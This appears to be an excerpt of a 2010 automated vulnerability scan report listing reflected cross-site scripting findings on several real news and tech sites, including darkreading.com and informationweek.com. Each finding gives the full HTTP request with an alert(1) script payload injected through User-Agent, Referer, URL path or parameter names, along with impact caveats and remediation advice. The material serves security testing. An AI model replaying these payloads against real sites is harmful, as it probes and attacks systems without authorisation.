GET /news/software/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9dac0"-alert(1)-"9c7391968ee Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=XXBMOKBMOUXWJQE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32149
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9dac0"-alert(1)-"9c7391968ee"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c70b"-alert(1)-"02cef8199e2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp HTTP/1.1 Host: www.internetevolution.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c70b"-alert(1)-"02cef8199e2 Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e381d"-alert(1)-"fdd973678 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp?section_id=949&doc_id=190224&f_src=internetevolution_gnews HTTP/1.1 Host: www.internetevolution.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e381d"-alert(1)-"fdd973678 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bdec"><script>alert(1)</script>bb0216f190a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /a/Voice-Data-and-IP/ab103dc2-d49c-444f-bd41-e7df70348eef.html HTTP/1.1 Host: www.itworldcanada.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2bdec"><script>alert(1)</script>bb0216f190a
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3dcc9<script>alert(1)</script>d6bfd8eb8e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /a/Voice-Data-and-IP/ab103dc2-d49c-444f-bd41-e7df70348eef.html HTTP/1.1 Host: www.itworldcanada.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3dcc9<script>alert(1)</script>d6bfd8eb8e8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc7d"><a>67a3810d154 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /blog/security/hundreds-of-high-profile-sites-unprotected-from-domain-hijacking/6248 HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 9cc7d"><a>67a3810d154
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5040"-alert(1)-"a2516965a67 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e5040"-alert(1)-"a2516965a67 Connection: close
1.244. http://www.darkreading.com/blog.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61502"><script>alert(1)</script>98765b900ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog.asp?61502"><script>alert(1)</script>98765b900ea=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57eb1"-alert(1)-"67f8ee7bdce was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57eb1"-alert(1)-"67f8ee7bdce Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff4b5"><script>alert(1)</script>fb54d3b4e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacksff4b5"><script>alert(1)</script>fb54d3b4e67/showArticle.jhtml HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc2ea"><script>alert(1)</script>586e15f22cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacks/showArticle.jhtmldc2ea"><script>alert(1)</script>586e15f22cd HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e747a"-alert(1)-"5609a7f9a91 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/attacks/showArticle.jhtml HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e747a"-alert(1)-"5609a7f9a91 Connection: close
1.249. http://www.darkreading.com/security/attacks/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/attacks/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab927"><script>alert(1)</script>dc410d64aa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacks/showArticle.jhtml?ab927"><script>alert(1)</script>dc410d64aa4=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84801"><script>alert(1)</script>a70b4586c38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities84801"><script>alert(1)</script>a70b4586c38/showArticle.jhtml HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c54"><script>alert(1)</script>f9546e78d9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities/showArticle.jhtmla8c54"><script>alert(1)</script>f9546e78d9c HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73d4b"-alert(1)-"af4361fc0be was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/vulnerabilities/showArticle.jhtml HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73d4b"-alert(1)-"af4361fc0be Connection: close
1.253. http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/vulnerabilities/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf28"><script>alert(1)</script>22b4d1fe4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities/showArticle.jhtml?5cf28"><script>alert(1)</script>22b4d1fe4b6=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close